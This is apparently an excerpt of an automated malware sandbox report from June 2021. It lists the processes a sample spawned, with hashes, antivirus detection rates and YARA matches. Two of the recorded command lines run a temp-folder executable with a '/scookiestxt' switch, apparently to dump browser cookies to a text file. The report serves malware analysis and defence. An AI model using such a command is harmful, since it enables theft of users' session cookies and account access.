                                                                                                                                                                                      File size:62976 bytes
                                                                                                                                                                                      MD5 hash:A6279EC92FF948760CE53BBA817D6A77
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Analysis Process: conhost.exe PID: 6064 Parent PID: 6984

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:56
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff724c50000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Analysis Process: md8_8eus.exe PID: 5636 Parent PID: 1372

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:56
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:732160 bytes
                                                                                                                                                                                      MD5 hash:7A151DB96E506BD887E3FFA5AB81B1A5
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                      • Detection: 34%, Metadefender, Browse
                                                                                                                                                                                      • Detection: 93%, ReversingLabs

                                                                                                                                                                                      Analysis Process: jfiag3g_gg.exe PID: 4652 Parent PID: 4112

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:58
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:62976 bytes
                                                                                                                                                                                      MD5 hash:A6279EC92FF948760CE53BBA817D6A77
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Analysis Process: svchost.exe PID: 340 Parent PID: 4420

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:58
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                                                                                                      Imagebase:0x7ff6eb840000
                                                                                                                                                                                      File size:51288 bytes
                                                                                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000000.966814169.000001DA29CD0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000003.822255696.000001DA29C60000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                                                                                                                      Analysis Process: explorer.exe PID: 3424 Parent PID: 6224

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:23:01
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                      Imagebase:0x7ff6fee60000
                                                                                                                                                                                      File size:3933184 bytes
                                                                                                                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Analysis Process: jfiag3g_gg.exe PID: 4660 Parent PID: 4112

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:23:09
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:62976 bytes
                                                                                                                                                                                      MD5 hash:A6279EC92FF948760CE53BBA817D6A77
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Disassembly

                                                                                                                                                                                      Code Analysis